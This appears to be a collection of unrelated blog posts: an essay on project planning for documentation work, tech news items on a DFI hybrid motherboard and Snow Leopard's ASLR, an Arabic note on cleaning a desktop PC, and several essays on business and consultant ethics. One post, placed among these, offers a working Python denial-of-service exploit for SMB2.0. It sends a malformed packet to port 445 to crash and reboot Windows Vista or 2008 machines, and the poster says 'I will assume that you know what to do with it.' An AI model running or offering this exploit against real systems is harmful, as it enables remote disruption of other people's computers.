Hi and سلام to All

Or rather, why there should be a Planning Phase in the project plan?

From all the staff at whatiknow.net a great Eid Muburak to all our Islamic readers and greetings to all others.

I have been asked to blog about the requirement for planning in IT, that is; what is planning? what does it do? and why should I do it? The reason for this topic is extremely funny (to me that is) but not to my fearless project manager friend who eats, breathes and sleeps according to PMBOK. Yes, I would like to call him ’grasshopper’. His story goes along the line of (from the horse’s mouth so to say);

I am engaged at a client who wanted some documentation done, simple stuff. Operational processes and procedures, you know what I mean? How difficult is it to run a project for and to deliver documentation?

At this stage, I nearly drowned on the sip of tea I had taken. Ha, a project that has the deliverable ‘documentation’ hidden somewhere in it’s Charter and Scope is more of a nightmare than say meeting your bank manager in the unemployment queue. So, how is documentation related to planning? Well, put it this way, remember the carpenter/dress making saying; ‘Measure twice, cut once’?

Planning allows you to do this. Measure what is expected and plan the delivery.

Now, the client has a Quality Management System (QMS) in place (ISO 9002) which stipulates certain requirements for documentation, how it is created, stored, distributed and communicated. Yes, the company actually has a ‘template’ for an operational process and procedure that was signed off by the QMS board. So? What’s the problem? Nothing if you are the client, aches and pains if you are my friend!

My friend then went on to tell me that his company had been given the work to ”Compile, Approve and Implement” the processess and procedures and you guessed it, the sales person did not even ask the subject matter expert for expected time frames. After all, you can write a process in say 3 days, 10 processess equals 30 days less 5 as you will not have to do all from scratch. So, total man-days is 25 (including discount). And the deliverables? Draft, Approve and Implement 10 business processes and procedures (process and procedure seen as 1 document).

Simple? Yes. Understandable? Yes. Doable? Yes!

The question is, will it meet the client’s expectations? No. Why? The client’s QMS requires all documents to be reviewed by relevant internal parties and to follow a change management process. One of the requirements of the change management process is the ‘Reason to create and/or modify the document’ and this is where the tremors started, went to 9.5 on the Richter Scale and ended up with a Tsunami with the different departments at the client getting along like a house on fire, No survivors!

Lets see, my friend has been there for 4 months now, he is running the project at a loss and his company can not withdraw due to contractual obligations. I estimate that they will be at the client for another 3 months.

So, what will planning have told us?

1. That there was a QMS in place and what was required.
2. The process to follow to create, modify or delete a document.
3. Certain default document requirements as in, Who, What, Where, When, Why and How?
4. Identified all relevant parties and departments.
5. Confirmed the template.
6. Confirmed the content.
7. Confirmed the ‘Implementation’ process.
8. Confirmed that the client did all processes and procedures following Business Process Management principles.
9. Allowed my friend to motivate why 3 days per document was not sufficient and to request a ‘Change of Scope‘. That is, to manage the project by Scope Change .

So, what would the planning phase have included?

1. Meet with the client, Subject Matter Expert NOT Salesperson.
2. Identify documents to be delivered with the client (their buy-in and agreement).
3. Understand client’s methodology and requirements (QMS and DMS).
4. Agree on the content of the documents (what has to be in, their buy-in and agreement).
5. Roles and Responsibilities (you can not have the QMS board meet to agree on a document).
6. Get the client to understand why the project is bigger than what was specified.
7. Identify key role players.
8. Schedule the meetings in advance.
9. Agree on the deliverable template (Word, Excel, Visio, Open Office etc).
10. Know the dynamics of the client’s site. Who sits higher in the tree and who may prevent you from getting paid.

Taking this into account, what do you charge the client? I believe that all work done at a client for the client is chargable, maybe at a lessor rate as no intellectual property should be required. Shjould it be free? No, as the client may see this as a business process management exercise and delay the start of the project resulting in a delay to your payment.

What are your thoughts, next up, planning for technology roleout.

These days, the word “hybrid” gets tossed around like a rag doll. We’ve got hybrid cars, hybrid SLI and hybrid image stabilization — and that’s just for starters. But friends, this hybrid is one worth paying attention to. DFI has been working overtime in order to concoct the next great mainboard, and if this thing can really deliver as advertised, we’d say the gurus responsible for it will succeed greatly. The Hybrid P45-ION-T2A2 motherboard can actually house a complete Atom / Ion-based system on one side, while handling a traditional Socket 775 CPU system on the other. In other words, this single motherboard can power — let’s say — a low-power server system and your next gaming setup. At the same time! We’re still waiting on a firm release date and price, but ’til then, hop on past the break for a swell demonstration vid.

Source: Engadget.com

Snow Leopard lacks security features that are built in to Windows XP, Windows Vista and Windows 7, a noted Mac researcher has said. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus make it harder for them to craft reliable exploits.

“Apple didn’t change anything,” said Charlie Miller, of Baltimore-based Independent Security Evaluators, the co-author of The Mac Hacker’s Handbook, and winner of two consecutive “Pwn2own” hacker contests. “It’s the exact same ASLR as in Leopard, which means it’s not very good.”

Interesting news isn’t it you can continue reading @ the source here

There is a flaw in SMB2.0 which exists (I mean the SMBv2 itself not the vulnerability) in windows vista, 2008,7 and 2008 R2 but only Windows Vista & 2008 are vulnerable. If you exploited this flaw successfully you will crash & reboot any vista or 2008 remotely (of course only if SMB 445 port open ). Anyhow here is the exploit code it’s written in python & I will assume that you know what to do with it

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated – US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a “&” char in the “Process Id High” header field it
dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –> normal operation should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Hi and سلام to All

To all Islamic readers, Happy Ramadan!

Thanks to all who have asked me to post other subjects and have enjoyed the posts?

I have a question for the people out there; what is the difference between and Ethics and Morals? Look further down for the answer.

This subject is something close to my heart as I have two different opinions on the subject.

If you look at the economic climate today and the amount of people who have been retrenched you could say that there is not. Why do I say this? Easy, it was caused by the hunt for more money and higher profits which would result in more money in the person’s pockets. So, the rich got richer, the poor become poorer and the middle income lost a lot.

On the other hand, if you look at companies that have a social responsibility programme, such as Vodafone which made the decision not to install cellular masts in certain areas and is in the process of making a decision on whether it will remove all mats from major motorways to prevent people from talking and driving at the same time. Or the case of BHP Billiton who chose to close a very profitable mine as there was a chance of loss of life.

When I talk to people about ethics, I have always told them that in my opinion. When you live at home, you get and learn your ethics and morals from your parents, when you reach your teens; you get it from your friends and from your parents. However, when you leave home and you go to work, this changes. You, if you choose to, now get your business ethics from your management. Why? To further your career.

Taking all of this into account and from experience, the ethics of the business is determined by the appetite for risk that management have. If management is willing to discuss and act on the requirement for Risk Management and Corporate Governance, you will find that the company has a high level of ethics However; if management is not bothered you will find that the company has low or no ethics. You can also see it in the way that the company deals with its staff, do they treat them well or are they just paid slaves? Does the company put social responsibilities before profits or put profits before anything else?

This brings the question of how do you improve profits? Many financial people will give you a formula on what it is and how it is made but most seem to miss out on the ‘Human‘ factor. To increase profits, you must lower your costs or improve the efficiency of your work force. One way of lowering your costs is to automate the processes or to simply retrench some employees and get the remaining staff to work harder. This is what I call the cost of service, service in this instant could be a physical object, a call centre or customer support. When a company starts losing profits what is their first reaction? Yes you have it! Retrench, Retrench, Retrench. Look at what the major banks have done, they caused the current financial problem and their first action was to retrench. They do NOT retrench management; they did retrench the normal employee. On the other hand, some companies have, when faced with a loss of profits have chosen to keep the staff and cuts the salary and perks of management as management should have seen it coming over the horizon.

The European Union and especially the French have started to look at limiting the salary and perks of senior management. Why? They identified the fact that a company loses its ethics when management have the opportunity to increase their salary and perks. I hear the UK is about to do the same. Will it work? I believe so! Do you?

In summary I believe that there is ethics in business but that it is shown in few companies as the majority of companies are after the profits and the ability of management to improve their salary and perks. The companies that want profits but are will to limit their expectation based on their social responsibilities prove that there is ethics but unfortunately, these are few and far between.

Will governments be able to regulate and enforce social responsibility in companies? Only time will tell. I will not hold my breath and neither should you.

An ethical person is like a married man who knows he should not cheat on his wife. A moral man will not. I got it from NCIS which is a great show. Do you agree with the statement?

Cheers and We Aleichem As-Salam until next time,

Enjoy the rest of the week and may you and yours travel safely.

1. The primary function of a supplier,

2. The primary function of a consultant,

3. The differences between client and supplier,

4. The differences between supplier and consultant,

5. The differences between client and consultant,

6. Ethics as a consultant,

7. Ethics as an employee and

8. Is there ethics in business.

Hi and سلام to All

In this post, the use of the male ‘him/he‘ is used for easy reading and can be replaced by ‘her/she‘ depending on who is reading the post. For the ladies out there, I make a profuse apology.

I have been asked by reader to give examples of situations I have been in that have or may have impacted upon my ethics.

I must comment here that not all of you will have experienced all of them but I am sure you have experienced at least one.

The first example goes back to my time in the military where I was a corporal; I was in charge of a platoon and was responsible for their health and well being as well as their discipline. During an inspection by the commanding officer, he noted that the one toilet bowl was a bit ‘grey’. I checked it and the bowl was stained but not dirty, so, the toilet bowl would never be ‘white’. I informed him about this to which our Lieutenant took exception to. After the inspection was over, the commanding officer said that it was good and to continue. The Lieutenant on the other hand, must have thought it had cost him his name ‘good’ versus ‘excellent’. He told me to punish the platoon by taking them for a forced march (20 Kms) and to drill them for at least 2 hours after the march. I disagreed with him and told him so, I even refused to do it and ended up in front of the commanding officer who stated; ‘Ferreiro you are an un-commissioned officer who will take orders from officers and carry them out EVEN if you do not agree with them.’ I again refused to do it and asked for a transfer to another unit (32 Battalion) which was approved. I left the unit 3 days later. I actually saw the Lieutenant a few years later to his surprise when I was a sergeant, he lost this time as we were working with mature soldiers aged 25 and up which you treat differently to soldiers who are 16 thru 18 years. He tried the same stunt, telling his platoon sergeant to punish the platoon, again the sergeant refused and took it to the Regimental Sergeant Major who agreed with him, the end result is that the officer ended up doing a lot of extra duties to teach him about leadership. I do not believe to this day that he did.

The second example skips a few years ahead when I worked for a supplier. I was responsible for a security tool called ESM from Axent Technologies (who were later bought by Symantec). We were tasked by the client to perform a comparison test between 3 products which measured baseline security compliance to a standard, these being; Axent, Computer Associates and Digital. In the review following a testing methodology, it was found that the CA product was not up to scratch and may meet 30% of the client’s requirement. The Axent and Digital products were very much the same mainly due them both being created by Raxco which developed tools for VAX VMS. Both products would meet at least 90% of the client’s requirement. The sales person who was responsible for the account, told me to bias the report to show that the Axent product was better. In doing so, he could make the sale. I disagreed and he went to the MD who also told me to do it. Again I refused and told them I would give them the report and that they could change it to suit their requirements. Needless to say, the client had actually expected me to bias the report and when they received the report were pleasantly surprised that it was not. The MD had chosen not to change the report as his name would have had to be put on the report. We got the sale as the opposition were tasked to do the same investigation and they biased their reports. We received other work from the client and the company made money. I resigned from the company and cited the experience as one of the reasons. The MD promised me that it would not occur again, but once bitten twice shy.

The third example skips a few years ahead to when I was a manager at a big company. The company made a great deal of money so I thought they would have a feeling of better responsibility for compliance. In this instance, I found that some people are motivated only by money and not what is ‘right’. ‘Right’ in this sense being the fact that you do not contravene laws such as Intellectual Property and Copyright or report back to management about instances that are cannot be proved. In this case, I was told not to answer a vendor’s request for licensing information on their product. Along the same lines, I was told not to tell management about a report that I compiled showing the serious lack of licence management and the associated cost to ensure licence compliance. I was also told by management that I was to do an investigation into an employee to prove that they had done ‘something’ wrong. After doing all the checks and verifying the balances, it actually identified that the manager’s ‘friend’ had planted the evidence against the employee. When I reported this with facts and figures, the manager told me that I must have been wrong and that his ‘friend’ would not do anything of the sort even thought the evidence showed differently. I was moved to another division so had nothing else to do with the manager again other than to audit his operations and raise comments and associated risks. I have since left the company after understanding that even in a large company ‘ethics’ is based on how much money ends up in your back pocket. I have since heard that the company is under investigation by the Business Software Alliance (BSA) and that they face legal litigation both civil and criminal.

The last comes from a project that I was involved in where the client was informed that the contractors knew what they required and to accept the deliverables. When prompted by the lead consultant and myself about best practices and frameworks such as 27001, eTOM, COBIT and TOGAF we were told to keep quiet and do the work which we were tasked to deliver. When asked to design a solution which following all practices requires the client’s input, we were told to ‘just deliver’ and not to trust the client. Again, this is against all principles of client engagements for each of the multi-nationals involved in the project with perhaps one not even having one. The lead consultant was removed from the project for I quote ‘bringing the consortium into disrepute’. In a later meeting, I was informed that the solution must meet the client’s requirements of a 360 degree Information Security view. When I prompted the consortium of what was required to deliver this, I was told by the multi-national that this could be discussed and that they would ‘HACK’ their product to deliver a 360 degree view even though it was not able to do it. I have since left the project.

There are many other examples that I could use but I believe that highlight what I have been saying in my posts.

Cheers and Wa Alaikum As-Salam until next time,

Enjoy the rest of the week and may you and yours travel safely.

سلام عليكم جميعا توي مخلص الحين من عملية تنظيف الدسك توب حقي من الغبار (طلعت اوادم من الدسك توب موب غبار) وحبيت اشارككم بنتيجه التنظيف الا وهي درجات الحرارة قبل وبعد.. طبعا التنظيف اللي سويته شامل للدسك توب كله يعني المراوح اللي فيه وهي 6 مراوح بالاظافه الى المعالج ومروحه المعالج واخيرا وليس اخرااا المذربورد وكرت الشاشه الا وهو انفيديا 8800 جي تي اكس .. طبعا انا انظف جهازي تقريبا كل سنه وعمر الجهاز تقريبا 3 سنوات

Go Get it, What You Waiting For   

I already activated my desktop, laptop & netbook copies

Hi and سلام to All

‘In this post, the use of the male ‘him/he‘ is used for easy reading and can be replaced by ‘her/she‘ depending on who is reading the post. For the ladies out there, I make a profuse apology.

The subject I am posting today is what I have experienced in my careers in the Military and into IT then management and finally GRC.

As all of you know, when you work for a company, you get to know many people both in your department and outside. You can also see how they react to circumstances whether good or bad and how they handle themselves under stress and finally what their values in life are.

If we look at people who work in IT, the majority of us want stability and routine and to be in the know of what will be happening in the company. When I was in the Military, our primary focus was to look after our ‘buddies’ and ourselves and to follow ‘reasonable’ orders. How you differentiated them I still don’t know, but we survived, some didn’t but most did. The amazing thing was, we had things we would do and things we would not. We learnt very quickly to treat others right and to learn from our mistakes, why? One of your buddies could die if you did not. I believe that the Military has not changed in the past 20 years or so. You can see what the soldiers of all nations are saying, maybe not through their words, but through their deeds. And no, I do not mean the soldiers and officers who abuse their positions of trust with civilians and prisoners alike.

When we look at life out of the military, you see different scenarios in different professions. Take a lwayer for instance, he is legally bound to protect his client whether he is guilty or not. If the lawyer knows his client is guilty of the crime, the lawyer must go to reasonable means to get his client found not guilty/the case thrown out of court or remove himself from the trial.

Now look at directors of companies, their ‘only’ contract with the company they work for/with is to increase revenue and/or profitability. Why do I say this? They have a legal obligation to make sure that the  company performs, failure to do this could result in them being prosecuted either criminally or civil (a great motivator if not the only). Another motivation is the nice ‘bonus’ they get at the end of the year based on the performance of the company. Look at the current Credit crisis and you should see what I mean.  Watch the documentary ‘The-greed-game’ from www.freedocumetaries.org (http://www.freedocumentaries.org/film.php?id=275) to see how this could happen.

As mentioned previously, a person gets their ethics from more than one place, the foundation is laid by our parents and as we go through life, we either add to or remove from it depending on the situation. One of the entities that we learn ‘business’ ethics from is management in the company you work for. Why? Simple, they are the people who pay you and give you your bonus and/or can hire/fire you. So, everything you do at work should be focussed on what management want you to do, or rather, what the company requires. Failure to do this WILL have an impact on your family, finances, career and personal outlook on life.

So, where does the ethics come in, you work for a company as an employee or contractor/consultant and are bound by the company’s rules and regulations. This is both good  and bad, good because you are earning money to support your family, bad because you are being sucked into the corporate (company’s) culture and everything that goes with it.  You may be called upon to do a task that you do not agree with or don’t like. What do you not like about the task? Is it personal or professional or both? If it is personal, is it against your principles, ethics or religion? If professional, is it against your ethics or ‘professionalism’. As previously mentioned, ethics is relevant to the position you are in and the situation you find youself in. What are your options? Do the task and shrug it off (Nuremberg comes to mind), or tell management that you would prefer not to do the task for reasons a,b,c?

Having been in this situation many times in the past and I  am sure to be there in the future, it is difficult to make the decision. As a consultant, the choice is easier, as an employee NOT. As a soldier it was easy as well, we were clothed and fed and the worst that could happen is to be court martialled and go to military jail. Not so in the civilian job market, failure to do the task could impact on your (amongst others);

• Name,
• Family,
• Job status,
• Future earning potential and
• Career progression.

You could move from been employed to unemployed quite quickly especially if you annoy your management by saying you will not.

There is a way out of this, unless the task is against your religion. Mainly, make management aware of your concerns (in writing) and request that they agree in writing. This takes you out of the hot seat and puts them in it. As a manager, they need to then either confirm your concerns and tell you to continue or taking into account you concerns, tell you to continue. Remember, no one may tell you to do something that is illegal under the laws of the land, not even the police. So, with this piece of paper in hand, you do the task. I do not believe that you have lost or forgotten your ethics but rather have placed the ethical decision on the person who pays your salary and allows you to eat every day and have proof of their decision.

In my humble opinion, as an employee, you can keep your ethics and your job by transferring the ethical decision to a higher authority. Believe me, management starts thinking when they are presented with the concerns of their staff about a task.

REMEMBER: A religious decision is another thing that is personal to yourself and NOT management, they employed you (maybe knowing your religion) but it was not the deciding factor (or was it?). How you handle this, I don’t know and can not give you any advice other than to think it through and find someone to talk to who has been in the same situation or has helped others make a decision along the same lines.

Another decision you will need to make; knowing the ethics of the company you work with/for. Are you willing to continue working for them or to seek alternative employment. The decision does, as always, rest with you and your family.

Just a parting note, a few weeks ago, my daughter asked me why I was not going to work everyday like I used to (which has impacted my family to the extent that I will again have to leave my home country [ZA] and seek employment overseas), I asked her ‘how can I teach you about ethics if I did not live them?’. Even at 7.5 years, she said I could not.

My next post will be about ‘Is there ethics in business?‘

Cheers and Wa Alaikum As-Salam until next time,

Enjoy the rest of the week and may you and yours travel safely.

1. The primary function of a supplier,
2. The primary function of a consultant,
3. The differences between client and supplier,
4. The differences between supplier and consultant,
5. The differences between client and consultant,
6. Ethics as a consultant,
7. Ethics as an employee and
8. Is there ethics in business.

Hi and سلام to All

‘In this post, the use of the male ‘him/he‘ is used for easy reading and can be replaced by ‘her/she‘ depending on who is reading the post. For the ladies out there, I make a profuse apology.

If you have read my previous posts you would have (hopefully) seen a trend of the need for ethical professional behaviour in consultants. The reason for this is that consultants only have their ‘name‘ to market their services. Not like a ‘resource‘ (refer to previous post),  that can hide behind the name of the company they work for. For example; You contract a company (lets say ‘X‘) to run your IT infrastructure, the company has said all the right words and make themselves shine in the area of service delivery. When they start running your infrastructure you notice that something has gone wrong or is faulty resulting in a problem for your company. What do you do? Call in the account manager. You tell him to sort the problem out and you use the term; ‘Company X really messed up’ when anyone asks you about Company X or in general discussions.

Now take the same scenario for a ‘consultant‘ (lets say ‘Y’), you have contracted him to do a job based on your requirements, understanding and expectations for the deliverable. Now, being a good customer, you have adopted the principles of ‘Project Management‘ and have project planned the deliverables (SCOPE and CHARTER). The project is hopefully a ‘fixed cost’ project and NOT ’Time and Material’! Yes, there is a difference. The consultant starts working on the deliverable and for some or other reason is sidetracked by some other work either at your or another company. The end result is that the project is not delivered on time OR the deliverable does not meet your expectations. The consultant tells you that the deliverables are not what is expected due to ‘unforseen’ circumstances. Now, when you are asked about the work that was done, what do you say? ‘Y does not know what he is doing, he does not deliver what was expected’. Is this true? Look what has happened in your company in the past and you will see that it is, EVEN if the consultant is contracted through a third party.

So, what do I say about the ethical behaviour of the consultant? Remember, the consultant must make money in order to eat and drive that smart car of his. Taking into account that the consultant only has his name to get more work he has to do the honourable thing and ‘not lie or tell untruths‘. Take my word for it; this is difficult when an employee is making your life hell and preventing you from delivering what was agreed upon. Does the consultant make the concious decision to remove himself from the project due to ‘non performance’ or ‘loss of name’? Yes or No? I say no, unless there is evidence of ‘fraudulent activity‘ that could result in him going to jail in the event that he does not bring it to the authority’s attention and meeting ‘Baba‘ (been in this situation many times) or if management has alterior motives and they use him to build a fictitious (not real or true; imaginary or invented) case against another person. The consultant must tell the truth as he sees it or what he has observed. To do anything else is, in my humble opinion, unethical.

Hopefully, your company has demanded that the consultant has certification from international bodies, these bodies have a ‘code of conduct‘. While each one seems different, they are, in principle, not. He must give the client the best advice based on knowledge and expertise, this includes the naming of the person who has prevented him from doing his work. Why? It informs management that there is a person in the company that is not bothered with management’s decision to employ the consultant. The end result is, in my experience, management’s approval for identifying another problem and bringing it to their attention. The downside is that the person will always tell everyone that you did not do your work.

So, what does the consultant do in reality? He MUST determine how management think as they will determine whether he gets paid or not. His decision on what he tells management is based on the way they think. Trust me, this is not easy. He should also have a project closure/handover meeting with a report that  indicates to management the responses he received from the employees. Why you ask? Easy, the report is not ‘official‘ and can be used by management for whatever purpose.

Another one is; if the consultant must deliver a ‘findings report‘ as part of the deliverables, he should (MUST?) indicate the facts as identified. The ‘tone‘ of the report is however different and is based on the audience; Auditors want the truth (as it is), management want it to indicate what they are doing well and minimise what they are not doing although the consultant should put this in the report. The one is a basic cake, the other is a cake with icing sugar which makes it easier to swallow. By doing this, I believe that the consultant has acted ‘ethically’, failure to do this is an indication that the consultant is primarily concerned with getting paid and not ‘rocking’ the boat. This usually ends up with a report that has content (?) but is NOT applicable or is of no value to the customer.

The question I ask the consultant out there, does the product you deliver add to the client’s knowledge or is it toilet paper/shelf ware? If it adds value, the job has been done ethically else? You decide!

Please, to all the people that are making comments, make sure that your email address is valid, I can not respond to you if the mail bounces with ‘Account does not exist‘.

Comments are as always, appreciated.

Cheers and Wa Alaikum As-Salam until next time,

Enjoy the rest of the week and may you travel safely.

1. The primary function of a supplier,
2. The primary function of a consultant,
3. The differences between client and supplier,
4. The differences between supplier and consultant,
5. The differences between client and consultant,
6. Ethics as a consultant,
7. Ethics as an employee and
8. Is there ethics in business.